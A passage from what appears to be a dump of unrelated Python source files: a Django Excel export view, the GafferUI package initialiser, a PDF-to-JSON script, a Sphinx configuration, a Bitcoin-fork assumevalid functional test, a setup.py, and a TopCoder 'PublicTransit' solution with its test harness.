Expanses':'other_expanses',\n\t\t'Discount':'discounted_total',\n\t\t'Gross Value':'gross_value',\n\t}\n\t\n\trow_num = 1\n\n\tall_indents = indent.objects.all().filter(WO=my_wo)\n\n\t# Assign the titles for each cell of the header\n\tfor col_num, column_title in enumerate(col_dict, 1):\n\t\tcell = worksheet.cell(row=row_num, column=col_num)\n\t\tcell.font = Font(name='Calibri', bold=True, size=12)\n\t\tcell.alignment=Alignment(horizontal='left')\n\t\tcell.value = column_title\n\n\n\t# Iterate through all movies\n\tfor my_indent in all_indents:\n\t\trow_num += 1\n\t\t# Define the data for each cell in the row \n\t\trow = []\n\t\tfor i in col_dict:\n\t\t\ttemp = getattr(my_indent, col_dict[i])\n\t\t\t# print(temp)\n\t\t\tif str(type(temp)) == \"\":\n\t\t\t\trow.append(temp())\n\t\t\telse:\n\t\t\t\trow.append(temp)\n\t\t\t\t# Assign the data for each cell of the row \n\t\tfor col_num, cell_value in enumerate(row, 1):\n\t\t\tcell = worksheet.cell(row=row_num, column=col_num)\n\t\t\tcell.alignment=Alignment(horizontal='left')\n\t\t\tcell.value = cell_value\n\n\tworkbook.save(response)\n\n\treturn response\n\ndef export_po_xls(request,po_id):\n\tmy_po = purchase_order.objects.all().filter(id=po_id).first()\n\tresponse = HttpResponse(\n\t\tcontent_type='application/vnd.openxmlformats-officedocument.spreadsheetml.sheet',\n\t)\n\tresponse['Content-Disposition'] = f'attachment; filename={my_po.po_number} Indents.xlsx'\n\tworkbook = Workbook()\n\n\t\n\t# Get active worksheet/tab\n\tworksheet = workbook.active\n\tworksheet.title = f'{my_po.po_number} Indents'\n\n\t# Define the titles for columns\n\tcol_dict = {\n\t\t'Indent ID':'id',\n\t\t'Description':'description',\n\t\t'Material Type':'material_type',\n\t\t'Quantity':'quantity',\n\t\t'Weight':'get_weight',\n\t\t'Unit value':'value',\n\t\t'Tax (in %)':'tax',\n\t\t'Tax Value':'tax_amount',\n\t\t'Other Expanses':'other_expanses',\n\t\t'Discount':'discounted_total',\n\t\t'Gross Value':'gross_value',\n\t}\n\t\n\trow_num = 1\n\n\tall_indents = indent.objects.all().filter(PO=my_po)\n\n\t# Assign the titles for each cell of the header\n\tfor col_num, column_title in enumerate(col_dict, 1):\n\t\tcell = worksheet.cell(row=row_num, column=col_num)\n\t\tcell.font = Font(name='Calibri', bold=True, size=12)\n\t\tcell.alignment=Alignment(horizontal='left')\n\t\tcell.value = column_title\n\n\n\t# Iterate through all movies\n\tfor my_indent in all_indents:\n\t\trow_num += 1\n\t\t# Define the data for each cell in the row \n\t\trow = []\n\t\tfor i in col_dict:\n\t\t\ttemp = getattr(my_indent, col_dict[i])\n\t\t\t# print(temp)\n\t\t\tif str(type(temp)) == \"\":\n\t\t\t\trow.append(temp())\n\t\t\telse:\n\t\t\t\trow.append(temp)\n\t\t\t\t# Assign the data for each cell of the row \n\t\tfor col_num, cell_value in enumerate(row, 1):\n\t\t\tcell = worksheet.cell(row=row_num, column=col_num)\n\t\t\tcell.alignment=Alignment(horizontal='left')\n\t\t\tcell.value = cell_value\n\n\tworkbook.save(response)\n\n\treturn response\n\n"} {"ext": "py", "sha": "1a2f9278bb9e4a8fb5bda1d5b89aa3b45d4a9b13", "content": "##########################################################################\n#\n# Copyright (c) 2011-2012, John Haddon. All rights reserved.\n# Copyright (c) 2011-2015, Image Engine Design Inc. All rights reserved.\n#\n# Redistribution and use in source and binary forms, with or without\n# modification, are permitted provided that the following conditions are\n# met:\n#\n# * Redistributions of source code must retain the above\n# copyright notice, this list of conditions and the following\n# disclaimer.\n#\n# * Redistributions in binary form must reproduce the above\n# copyright notice, this list of conditions and the following\n# disclaimer in the documentation and/or other materials provided with\n# the distribution.\n#\n# * Neither the name of John Haddon nor the names of\n# any other contributors to this software may be used to endorse or\n# promote products derived from this software without specific prior\n# written permission.\n#\n# THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS \"AS\n# IS\" AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO,\n# THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR\n# PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT OWNER OR\n# CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL,\n# EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT LIMITED TO,\n# PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE, DATA, OR\n# PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY THEORY OF\n# LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT (INCLUDING\n# NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE OF THIS\n# SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.\n#\n##########################################################################\n\n# Work around a bug which causes segfaults if uuid is imported after\n# PyQt. See here for details :\n#\n# https://bugs.gentoo.org/show_bug.cgi?id=317557\n# http://www.riverbankcomputing.com/pipermail/pyqt/2010-December/028773.html\n#\n# Using __import__ rather than import so that we don't pollute the GafferUI\n# namespace.\n__import__( \"uuid\" )\n\n##########################################################################\n# Function to return the C++ address of a wrapped Qt object. This can\n# be useful if needing to implement part of the UI in C++ and the rest\n# in Python.\n##########################################################################\n\ndef _qtAddress( o ) :\n\n\timport Qt\n\tif \"PyQt\" in Qt.__binding__ :\n\t\timport sip\n\t\treturn sip.unwrapinstance( o )\n\telse :\n\t\treturn __shiboken().getCppPointer( o )[0]\n\n##########################################################################\n# Function to return a wrapped Qt object from the given C++ address.\n# This can be useful if needing to implement part of the UI in C++ and\n# the rest in Python.\n##########################################################################\n\ndef _qtObject( address, type ) :\n\n\timport Qt\n\tif \"PyQt\" in Qt.__binding__ :\n\t\timport sip\n\t\treturn sip.wrapinstance( address, type )\n\telse :\n\t\treturn __shiboken().wrapInstance( address, type )\n\n##########################################################################\n# Determines if the wrapped Qt object is still valid\n# Useful when having to deal with the consequences of C++/Python deletion\n# order challeneges, see:\n# https://github.com/GafferHQ/gaffer/pull/3179\n##########################################################################\n\ndef _qtObjectIsValid( o ) :\n\n\timport Qt\n\tif \"PyQt\" in Qt.__binding__ :\n\t\timport sip\n\t\treturn not sip.isdeleted( o )\n\telse :\n\t\treturn __shiboken().isValid( o )\n\n##########################################################################\n# Shiboken lives in a variety of places depending on which PySide it is.\n##########################################################################\n\ndef __shiboken() :\n\n\timport Qt\n\tassert( \"PyQt\" not in Qt.__binding__ )\n\n\tif Qt.__binding__ == \"PySide2\" :\n\t\ttry :\n\t\t\timport PySide2.shiboken2 as shiboken\n\t\texcept ImportError :\n\t\t\timport shiboken2 as shiboken\n\telse :\n\t\ttry :\n\t\t\timport PySide.shiboken\n\t\texcept ImportError :\n\t\t\timport shiboken\n\n\treturn shiboken\n\n##########################################################################\n# now import our actual functionality\n##########################################################################\n\n# Import modules that must be imported before _GafferUI, using __import__\n# to avoid polluting the GafferUI namespace.\n__import__( \"IECore\" )\n__import__( \"Gaffer\" )\n\nfrom ._GafferUI import *\n\n# general ui stuff first\n\nfrom .Enums import *\nfrom .Widget import Widget\nfrom .LazyMethod import LazyMethod\nfrom .Menu import Menu\nfrom .ContainerWidget import ContainerWidget\nfrom .Window import Window\nfrom .SplitContainer import SplitContainer\nfrom .ListContainer import ListContainer\nfrom .GridContainer import GridContainer\nfrom .MenuBar import MenuBar\nfrom .EventLoop import EventLoop\nfrom .TabbedContainer import TabbedContainer\nfrom .TextWidget import TextWidget\nfrom .NumericWidget import NumericWidget\nfrom .Button import Button\nfrom .MultiLineTextWidget import MultiLineTextWidget\nfrom .Label import Label\nfrom .GLWidget import GLWidget\nfrom .ScrolledContainer import ScrolledContainer\nfrom .PathWidget import PathWidget\nfrom .PathListingWidget import PathListingWidget\nfrom .PathChooserWidget import PathChooserWidget\nfrom .Dialogue import Dialogue\nfrom .PathChooserDialogue import PathChooserDialogue\nfrom .TextInputDialogue import TextInputDialogue\nfrom .Collapsible import Collapsible\nfrom .ColorSwatch import ColorSwatch\nfrom .Slider import Slider\nfrom .ShowURL import showURL\nfrom .Spacer import Spacer\nfrom .BoolWidget import BoolWidget, CheckBox\nfrom .Image import Image\nfrom .ErrorDialogue import ErrorDialogue\nfrom ._Variant import _Variant\nfrom .VectorDataWidget import VectorDataWidget\nfrom .PathVectorDataWidget import PathVectorDataWidget\nfrom .ProgressBar import ProgressBar\nfrom .SelectionMenu import SelectionMenu\nfrom .PathFilterWidget import PathFilterWidget\nfrom .CompoundPathFilterWidget import CompoundPathFilterWidget\nfrom .InfoPathFilterWidget import InfoPathFilterWidget\nfrom .MatchPatternPathFilterWidget import MatchPatternPathFilterWidget\nfrom .FileSequencePathFilterWidget import FileSequencePathFilterWidget\nfrom .BusyWidget import BusyWidget\nfrom .NumericSlider import NumericSlider\nfrom .ColorChooser import ColorChooser\nfrom .ColorChooserDialogue import ColorChooserDialogue\nfrom .MessageWidget import MessageWidget, MessageSummaryWidget\nfrom .NotificationMessageHandler import NotificationMessageHandler\nfrom .MenuButton import MenuButton\nfrom .MultiSelectionMenu import MultiSelectionMenu\nfrom .PopupWindow import PopupWindow\nfrom .ConfirmationDialogue import ConfirmationDialogue\nfrom .DisplayTransform import DisplayTransform\nfrom .Divider import Divider\nfrom . import _Pointer\nfrom .SplineWidget import SplineWidget\nfrom .Bookmarks import Bookmarks\nfrom . import WidgetAlgo\n\n# then all the PathPreviewWidgets. note that the order\n# of import controls the order of display.\n\nfrom .PathPreviewWidget import PathPreviewWidget\nfrom .CompoundPathPreview import CompoundPathPreview\nfrom .DeferredPathPreview import DeferredPathPreview\nfrom .InfoPathPreview import InfoPathPreview\nfrom .HeaderPathPreview import HeaderPathPreview\nfrom .DataPathPreview import DataPathPreview\n\n# then stuff specific to graph uis\n\nfrom .BackgroundMethod import BackgroundMethod\nfrom .PlugValueWidget import PlugValueWidget\nfrom .StringPlugValueWidget import StringPlugValueWidget\nfrom .NumericPlugValueWidget import NumericPlugValueWidget\nfrom .BoolPlugValueWidget import BoolPlugValueWidget\nfrom .PathPlugValueWidget import PathPlugValueWidget\nfrom .FileSystemPathPlugValueWidget import FileSystemPathPlugValueWidget\nfrom .VectorDataPlugValueWidget import VectorDataPlugValueWidget\nfrom .PathVectorDataPlugValueWidget import PathVectorDataPlugValueWidget\nfrom .FileSystemPathVectorDataPlugValueWidget import FileSystemPathVectorDataPlugValueWidget\nfrom .PlugWidget import PlugWidget\nfrom .PlugLayout import PlugLayout\nfrom .Editor import Editor\nfrom .PythonEditor import PythonEditor\nfrom .GadgetWidget import GadgetWidget\nfrom .GraphEditor import GraphEditor\nfrom .ScriptWindow import ScriptWindow\nfrom .CompoundEditor import CompoundEditor\nfrom .NameWidget import NameWidget\nfrom .NameLabel import NameLabel\nfrom .NodeSetEditor import NodeSetEditor\nfrom .NodeEditor import NodeEditor\nfrom .Layouts import Layouts\nfrom .NodeMenu import NodeMenu\nfrom . import FileMenu\nfrom . import LayoutMenu\nfrom . import EditMenu\nfrom . import UserPlugs\nfrom .Frame import Frame\nfrom .CompoundNumericPlugValueWidget import CompoundNumericPlugValueWidget\nfrom .BoxPlugValueWidget import BoxPlugValueWidget\nfrom .NodeUI import NodeUI\nfrom .StandardNodeUI import StandardNodeUI\nfrom .NodeToolbar import NodeToolbar\nfrom .StandardNodeToolbar import StandardNodeToolbar\nfrom .Viewer import Viewer\nfrom .ColorSwatchPlugValueWidget import ColorSwatchPlugValueWidget\nfrom .ColorPlugValueWidget import ColorPlugValueWidget\nfrom .AboutWindow import AboutWindow\nfrom . import ApplicationMenu\nfrom .BrowserEditor import BrowserEditor\nfrom .Timeline import Timeline\nfrom .MultiLineStringPlugValueWidget import MultiLineStringPlugValueWidget\nfrom .PresetsPlugValueWidget import PresetsPlugValueWidget\nfrom .GraphComponentBrowserMode import GraphComponentBrowserMode\nfrom .ToolPlugValueWidget import ToolPlugValueWidget\nfrom .LabelPlugValueWidget import LabelPlugValueWidget\nfrom .CompoundDataPlugValueWidget import CompoundDataPlugValueWidget\nfrom .LayoutPlugValueWidget import LayoutPlugValueWidget\nfrom . import ScriptNodeUI\nfrom .RefreshPlugValueWidget import RefreshPlugValueWidget\nfrom . import PreferencesUI\nfrom .SplinePlugValueWidget import SplinePlugValueWidget\nfrom .RampPlugValueWidget import RampPlugValueWidget\nfrom .NodeFinderDialogue import NodeFinderDialogue\nfrom .ConnectionPlugValueWidget import ConnectionPlugValueWidget\nfrom .ButtonPlugValueWidget import ButtonPlugValueWidget\nfrom . import ViewUI\nfrom . import ToolUI\nfrom .Playback import Playback\nfrom . import MetadataWidget\nfrom .UIEditor import UIEditor\nfrom . import GraphBookmarksUI\nfrom . import DocumentationAlgo\nfrom . import _PlugAdder\nfrom .Backups import Backups\nfrom .AnimationEditor import AnimationEditor\nfrom . import CompoundNumericNoduleUI\nfrom . import Examples\nfrom .NameValuePlugValueWidget import NameValuePlugValueWidget\nfrom .ShufflePlugValueWidget import ShufflePlugValueWidget\nfrom .ShufflePlugValueWidget import ShufflesPlugValueWidget\n\n# and then specific node uis\n\nfrom . import DependencyNodeUI\nfrom . import ComputeNodeUI\nfrom . import RandomUI\nfrom . import SpreadsheetUI\nfrom . import ExpressionUI\nfrom . import BoxUI\nfrom . import ReferenceUI\nfrom . import BackdropUI\nfrom . import DotUI\nfrom . import SubGraphUI\nfrom . import SwitchUI\nfrom . import ContextProcessorUI\nfrom . import ContextVariablesUI\nfrom . import DeleteContextVariablesUI\nfrom . import TimeWarpUI\nfrom . import LoopUI\nfrom . import AnimationUI\nfrom . import BoxIOUI\nfrom . import BoxInUI\nfrom . import BoxOutUI\nfrom . import NameSwitchUI\nfrom . import EditScopeUI\n\n# backwards compatibility\n## \\todo Remove me\nMetadata = __import__( \"Gaffer\" ).Metadata\n\n__import__( \"IECore\" ).loadConfig( \"GAFFER_STARTUP_PATHS\", subdirectory = \"GafferUI\" )\n"} {"ext": "py", "sha": "1a2f9389e687aa056509a03a24247493b399b439", "content": "import pdf_to_json as p2j\n\nimport json\n\nurl = \"file:data/multilingual/Arab.URD/Serif_12/udhr_Arab.URD_Serif_12.pdf\"\nlConverter = p2j.pdf_to_json.pdf_to_json_converter()\nlConverter.mImageHashOnly = True\nlDict = lConverter.convert(url)\nprint(json.dumps(lDict, indent=4, ensure_ascii=False, sort_keys=True))\n"} {"ext": "py", "sha": "1a2f93a1abbf760f4bfdd75bbf26fa50bdde49ac", "content": "# -*- coding: utf-8 -*-\n#\n# python-bplsqlparse documentation build configuration file, created by\n# sphinx-quickstart on Thu Feb 26 08:19:28 2009.\n#\n# This file is execfile()d with the current directory set to its containing dir.\n#\n# Note that not all possible configuration values are present in this\n# autogenerated file.\n#\n# All configuration values have a default; values that are commented out\n# serve to show the default.\n\nimport datetime\nimport sys, os\n\n# If extensions (or modules to document with autodoc) are in another directory,\n# add these directories to sys.path here. If the directory is relative to the\n# documentation root, use os.path.abspath to make it absolute, like shown here.\n#sys.path.append(os.path.abspath('.'))\nsys.path.insert(0, os.path.join(os.path.dirname(__file__), '../../'))\n\nimport bplsqlparse\n\n# -- General configuration -----------------------------------------------------\n\n# Add any Sphinx extension module names here, as strings. They can be extensions\n# coming with Sphinx (named 'sphinx.ext.*') or your custom ones.\nextensions = ['sphinx.ext.autodoc', 'sphinx.ext.todo', 'sphinx.ext.coverage',\n 'sphinx.ext.autosummary']\n\n# Add any paths that contain templates here, relative to this directory.\ntemplates_path = ['_templates']\n\n# The suffix of source filenames.\nsource_suffix = '.rst'\n\n# The encoding of source files.\n#source_encoding = 'utf-8'\n\n# The master toctree document.\nmaster_doc = 'index'\n\n# General information about the project.\nproject = 'python-bplsqlparse'\ncopyright = '{:%Y}, Andi Albrecht'.format(datetime.date.today())\n\n# The version info for the project you're documenting, acts as replacement for\n# |version| and |release|, also used in various other places throughout the\n# built documents.\n#\n# The short X.Y version.\nversion = bplsqlparse.__version__\n# The full version, including alpha/beta/rc tags.\nrelease = bplsqlparse.__version__\n\n# The language for content autogenerated by Sphinx. Refer to documentation\n# for a list of supported languages.\n#language = None\n\n# There are two options for replacing |today|: either, you set today to some\n# non-false value, then it is used:\n#today = ''\n# Else, today_fmt is used as the format for a strftime call.\n#today_fmt = '%B %d, %Y'\n\n# List of documents that shouldn't be included in the build.\n#unused_docs = []\n\n# List of directories, relative to source directory, that shouldn't be searched\n# for source files.\nexclude_trees = []\n\n# The reST default role (used for this markup: `text`) to use for all documents.\n#default_role = None\n\n# If true, '()' will be appended to :func: etc. cross-reference text.\n#add_function_parentheses = True\n\n# If true, the current module name will be prepended to all description\n# unit titles (such as .. function::).\n#add_module_names = True\n\n# If true, sectionauthor and moduleauthor directives will be shown in the\n# output. They are ignored by default.\n#show_authors = False\n\n# The name of the Pygments (syntax highlighting) style to use.\npygments_style = 'tango'\n\n# A list of ignored prefixes for module index sorting.\n#modindex_common_prefix = []\n\n\n# -- Options for HTML output ---------------------------------------------------\n\n# The theme to use for HTML and HTML Help pages. Major themes that come with\n# Sphinx are currently 'default' and 'sphinxdoc'.\n#html_theme = 'agogo'\n\n# Theme options are theme-specific and customize the look and feel of a theme\n# further. For a list of options available for each theme, see the\n# documentation.\n#html_theme_options = {}\n\n# Add any paths that contain custom themes here, relative to this directory.\n#html_theme_path = [os.path.abspath('../')]\n\n# The name for this set of Sphinx documents. If None, it defaults to\n# \" v documentation\".\n#html_title = None\n\n# A shorter title for the navigation bar. Default is the same as html_title.\n#html_short_title = None\n\n# The name of an image file (relative to this directory) to place at the top\n# of the sidebar.\n#html_logo = None\n\n# The name of an image file (within the static path) to use as favicon of the\n# docs. This file should be a Windows icon file (.ico) being 16x16 or 32x32\n# pixels large.\n#html_favicon = None\n\n# Add any paths that contain custom static files (such as style sheets) here,\n# relative to this directory. They are copied after the builtin static files,\n# so a file named \"default.css\" will overwrite the builtin \"default.css\".\n#html_static_path = ['_static']\n\n# If not '', a 'Last updated on:' timestamp is inserted at every page bottom,\n# using the given strftime format.\n#html_last_updated_fmt = '%b %d, %Y'\n\n# If true, SmartyPants will be used to convert quotes and dashes to\n# typographically correct entities.\n#html_use_smartypants = True\n\n# Custom sidebar templates, maps document names to template names.\n#html_sidebars = {}\n\n# Additional templates that should be rendered to pages, maps page names to\n# template names.\n#html_additional_pages = {}\n\n# If false, no module index is generated.\n#html_use_modindex = True\n\n# If false, no index is generated.\n#html_use_index = True\n\n# If true, the index is split into individual pages for each letter.\n#html_split_index = False\n\n# If true, links to the reST sources are added to the pages.\n#html_show_sourcelink = True\n\n# If true, an OpenSearch description file will be output, and all pages will\n# contain a tag referring to it. The value of this option must be the\n# base URL from which the finished HTML is served.\n#html_use_opensearch = ''\n\n# If nonempty, this is the file name suffix for HTML files (e.g. \".xhtml\").\n#html_file_suffix = ''\n\n# Output file base name for HTML help builder.\nhtmlhelp_basename = 'python-sqlparsedoc'\n\n\n# -- Options for LaTeX output --------------------------------------------------\n\n# The paper size ('letter' or 'a4').\n#latex_paper_size = 'letter'\n\n# The font size ('10pt', '11pt' or '12pt').\n#latex_font_size = '10pt'\n\n# Grouping the document tree into LaTeX files. List of tuples\n# (source start file, target name, title, author, documentclass [howto/manual]).\nlatex_documents = [\n ('index', 'python-bplsqlparse.tex', 'python-bplsqlparse Documentation',\n 'Andi Albrecht', 'manual'),\n]\n\n# The name of an image file (relative to this directory) to place at the top of\n# the title page.\n#latex_logo = None\n\n# For \"manual\" documents, if this is true, then toplevel headings are parts,\n# not chapters.\n#latex_use_parts = False\n\n# Additional stuff for the LaTeX preamble.\n#latex_preamble = ''\n\n# Documents to append as an appendix to all manuals.\n#latex_appendices = []\n\n# If false, no module index is generated.\n#latex_use_modindex = True\ntodo_include_todos = True\n"} {"ext": "py", "sha": "1a2f945b414e7c4e58577b3059af0dc459d6abff", "content": "#!/usr/bin/env python3\n# Copyright (c) 2014-2016 The Bitcoinold Core developers\n# Distributed under the MIT software license, see the accompanying\n# file COPYING or http://www.opensource.org/licenses/mit-license.php.\n'''\nassumevalid.py\n\nTest logic for skipping signature validation on blocks which we've assumed\nvalid (https://github.com/bitcoinold/bitcoinold/pull/9484)\n\nWe build a chain that includes and invalid signature for one of the\ntransactions:\n\n 0: genesis block\n 1: block 1 with coinbase transaction output.\n 2-101: bury that block with 100 blocks so the coinbase transaction\n output can be spent\n 102: a block containing a transaction spending the coinbase\n transaction output. The transaction has an invalid signature. \n 103-2202: bury the bad block with just over two weeks' worth of blocks\n (2100 blocks)\n\nStart three nodes:\n\n - node0 has no -assumevalid parameter. Try to sync to block 2202. It will\n reject block 102 and only sync as far as block 101\n - node1 has -assumevalid set to the hash of block 102. Try to sync to\n block 2202. node1 will sync all the way to block 2202.\n - node2 has -assumevalid set to the hash of block 102. Try to sync to\n block 200. node2 will reject block 102 since it's assumed valid, but it\n isn't buried by at least two weeks' work.\n'''\n\nfrom test_framework.mininode import *\nfrom test_framework.test_framework import BitcoinoldTestFramework\nfrom test_framework.util import *\nfrom test_framework.blocktools import create_block, create_coinbase\nfrom test_framework.key import CECKey\nfrom test_framework.script import *\n\nclass BaseNode(SingleNodeConnCB):\n def __init__(self):\n SingleNodeConnCB.__init__(self)\n self.last_inv = None\n self.last_headers = None\n self.last_block = None\n self.last_getdata = None\n self.block_announced = False\n self.last_getheaders = None\n self.disconnected = False\n self.last_blockhash_announced = None\n\n def on_close(self, conn):\n self.disconnected = True\n\n def wait_for_disconnect(self, timeout=60):\n test_function = lambda: self.disconnected\n assert(wait_until(test_function, timeout=timeout))\n return\n\n def send_header_for_blocks(self, new_blocks):\n headers_message = msg_headers()\n headers_message.headers = [ CBlockHeader(b) for b in new_blocks ]\n self.send_message(headers_message)\n\nclass SendHeadersTest(BitcoinoldTestFramework):\n def __init__(self):\n super().__init__()\n self.setup_clean_chain = True\n self.num_nodes = 3\n\n def setup_network(self):\n # Start node0. We don't start the other nodes yet since\n # we need to pre-mine a block with an invalid transaction\n # signature so we can pass in the block hash as assumevalid.\n self.nodes = []\n self.nodes.append(start_node(0, self.options.tmpdir, [\"-debug\"]))\n\n def run_test(self):\n\n # Connect to node0\n node0 = BaseNode()\n connections = []\n connections.append(NodeConn('127.0.0.1', p2p_port(0), self.nodes[0], node0))\n node0.add_connection(connections[0])\n\n NetworkThread().start() # Start up network handling in another thread\n node0.wait_for_verack()\n\n # Build the blockchain\n self.tip = int(self.nodes[0].getbestblockhash(), 16)\n self.block_time = self.nodes[0].getblock(self.nodes[0].getbestblockhash())['time'] + 1\n\n self.blocks = []\n\n # Get a pubkey for the coinbase TXO\n coinbase_key = CECKey()\n coinbase_key.set_secretbytes(b\"horsebattery\")\n coinbase_pubkey = coinbase_key.get_pubkey()\n\n # Create the first block with a coinbase output to our key\n height = 1\n block = create_block(self.tip, create_coinbase(height, coinbase_pubkey), self.block_time)\n self.blocks.append(block)\n self.block_time += 1\n block.solve()\n # Save the coinbase for later\n self.block1 = block\n self.tip = block.sha256\n height += 1\n\n # Bury the block 100 deep so the coinbase output is spendable\n for i in range(100):\n block = create_block(self.tip, create_coinbase(height), self.block_time)\n block.solve()\n self.blocks.append(block)\n self.tip = block.sha256\n self.block_time += 1\n height += 1\n\n # Create a transaction spending the coinbase output with an invalid (null) signature\n tx = CTransaction()\n tx.vin.append(CTxIn(COutPoint(self.block1.vtx[0].sha256, 0), scriptSig=b\"\"))\n tx.vout.append(CTxOut(49*100000000, CScript([OP_TRUE])))\n tx.calc_sha256()\n\n block102 = create_block(self.tip, create_coinbase(height), self.block_time)\n self.block_time += 1\n block102.vtx.extend([tx])\n block102.hashMerkleRoot = block102.calc_merkle_root()\n block102.rehash()\n block102.solve()\n self.blocks.append(block102)\n self.tip = block102.sha256\n self.block_time += 1\n height += 1\n\n # Bury the assumed valid block 2100 deep\n for i in range(2100):\n block = create_block(self.tip, create_coinbase(height), self.block_time)\n block.nVersion = 4\n block.solve()\n self.blocks.append(block)\n self.tip = block.sha256\n self.block_time += 1\n height += 1\n\n # Start node1 and node2 with assumevalid so they accept a block with a bad signature.\n self.nodes.append(start_node(1, self.options.tmpdir,\n [\"-debug\", \"-assumevalid=\" + hex(block102.sha256)]))\n node1 = BaseNode() # connects to node1\n connections.append(NodeConn('127.0.0.1', p2p_port(1), self.nodes[1], node1))\n node1.add_connection(connections[1])\n node1.wait_for_verack()\n\n self.nodes.append(start_node(2, self.options.tmpdir,\n [\"-debug\", \"-assumevalid=\" + hex(block102.sha256)]))\n node2 = BaseNode() # connects to node2\n connections.append(NodeConn('127.0.0.1', p2p_port(2), self.nodes[2], node2))\n node2.add_connection(connections[2])\n node2.wait_for_verack()\n\n # send header lists to all three nodes\n node0.send_header_for_blocks(self.blocks[0:2000])\n node0.send_header_for_blocks(self.blocks[2000:])\n node1.send_header_for_blocks(self.blocks[0:2000])\n node1.send_header_for_blocks(self.blocks[2000:])\n node2.send_header_for_blocks(self.blocks[0:200])\n\n # Send 102 blocks to node0. Block 102 will be rejected.\n for i in range(101):\n node0.send_message(msg_block(self.blocks[i]))\n node0.sync_with_ping() # make sure the most recent block is synced\n node0.send_message(msg_block(self.blocks[101]))\n assert_equal(self.nodes[0].getblock(self.nodes[0].getbestblockhash())['height'], 101)\n\n # Send 3102 blocks to node1. All blocks will be accepted.\n for i in range(2202):\n node1.send_message(msg_block(self.blocks[i]))\n node1.sync_with_ping() # make sure the most recent block is synced\n assert_equal(self.nodes[1].getblock(self.nodes[1].getbestblockhash())['height'], 2202)\n\n # Send 102 blocks to node2. Block 102 will be rejected.\n for i in range(101):\n node2.send_message(msg_block(self.blocks[i]))\n node2.sync_with_ping() # make sure the most recent block is synced\n node2.send_message(msg_block(self.blocks[101]))\n assert_equal(self.nodes[2].getblock(self.nodes[2].getbestblockhash())['height'], 101)\n\nif __name__ == '__main__':\n SendHeadersTest().main()\n"} {"ext": "py", "sha": "1a2f94c20bfca4a4a80aa32e7f144f758c9ffa37", "content": "\nfrom setuptools import find_packages, setup\nfrom pathlib import Path\n\nthis_directory = Path(__file__).parent\nreadme = (this_directory / \"README.md\").read_text()\n\n\nsetup(\n name='sentencesimilarity',\n packages=find_packages(),\n version='0.1.1',\n description='Calculates semantic similarity between given sentences.',\n long_description= readme,\n long_description_content_type='text/markdown',\n author='osahin',\n author_email = \"oguuzhansahiin@gmail.com\",\n license='MIT',\n install_requires=['transformers==4.9.2','scikit_learn==0.24.2','torch==1.9.0'],\n setup_requires=['pytest-runner'],\n tests_require=['pytest==4.4.1'],\n test_suite='tests',\n)\n"} {"ext": "py", "sha": "1a2f94dba5ba24353eccf5534e2f85dec025ac23", "content": "# -*- coding: utf-8 -*-\nimport math,string,itertools,fractions,heapq,collections,re,array,bisect\n\nclass PublicTransit:\n\n def distRaw(self, R, C, i1, j1, i2, j2):\n # q = [(i1, j1, 0)]\n # deltas = [(1, 0), (-1, 0), (0, -1), (0, 1)]\n # while q:\n # i, j, d = q.pop(0)\n # if i == i2 and j == j2:\n # return d\n # for delta in deltas:\n # ni = i + delta[0]\n # nj = j + delta[1]\n # if 0 <= ni < R and 0 <= nj < C:\n # q.append((ni, nj, d+1))\n # return 1000\n return abs(i1-i2)+abs(j1-j2)\n\n\n\n def distAfterConnect(self, R, C, connect, i1, j1, i2, j2):\n if i1 == i2 and j1 == j2:\n return 0\n return min(self.distRaw(R, C, i1, j1, i2, j2), \\\n self.distRaw(R, C, i1, j1, connect[0], connect[1]) + self.distRaw(R, C, connect[2], connect[3], i2, j2), \\\n self.distRaw(R, C, i1, j1, connect[2], connect[3]) + self.distRaw(R, C, connect[0], connect[1], i2, j2))\n\n def maxDist(self, R, C, connect):\n res = 1\n for i1 in range(R):\n for j1 in range(C):\n for i2 in range(R-1, -1, -1):\n for j2 in range(C-1, -1, -1):\n if abs(i1-i2) + abs(j1-j2) <= res:\n continue\n res = max(res, self.distAfterConnect(R, C, connect, i1, j1, i2, j2))\n return res\n\n def minimumLongestDistance(self, R, C):\n\n if R <= 0 or C <= 0:\n return 0\n if R*C <= 2:\n return 1\n\n res = 1000\n for i1 in range(R):\n for j1 in range(C):\n for i2 in range(R):\n for j2 in range(C):\n if i1 == i2 and j1 == j2:\n continue\n # connect (i, j) and (i2, j2)\n res = min(res, self.maxDist(R, C, (i1, j1, i2, j2)))\n\n return res\n\n# CUT begin\n# TEST CODE FOR PYTHON {{{\nimport sys, time, math\n\ndef tc_equal(expected, received):\n try:\n _t = type(expected)\n received = _t(received)\n if _t == list or _t == tuple:\n if len(expected) != len(received): return False\n return all(tc_equal(e, r) for (e, r) in zip(expected, received))\n elif _t == float:\n eps = 1e-9\n d = abs(received - expected)\n return not math.isnan(received) and not math.isnan(expected) and d <= eps * max(1.0, abs(expected))\n else:\n return expected == received\n except:\n return False\n\ndef pretty_str(x):\n if type(x) == str:\n return '\"%s\"' % x\n elif type(x) == tuple:\n return '(%s)' % (','.join( (pretty_str(y) for y in x) ) )\n else:\n return str(x)\n\ndef do_test(R, C, __expected):\n startTime = time.time()\n instance = PublicTransit()\n exception = None\n try:\n __result = instance.minimumLongestDistance(R, C);\n except:\n import traceback\n exception = traceback.format_exc()\n elapsed = time.time() - startTime # in sec\n\n if exception is not None:\n sys.stdout.write(\"RUNTIME ERROR: \\n\")\n sys.stdout.write(exception + \"\\n\")\n return 0\n\n if tc_equal(__expected, __result):\n sys.stdout.write(\"PASSED! \" + (\"(%.3f seconds)\" % elapsed) + \"\\n\")\n return 1\n else:\n sys.stdout.write(\"FAILED! \" + (\"(%.3f seconds)\" % elapsed) + \"\\n\")\n sys.stdout.write(\" Expected: \" + pretty_str(__expected) + \"\\n\")\n 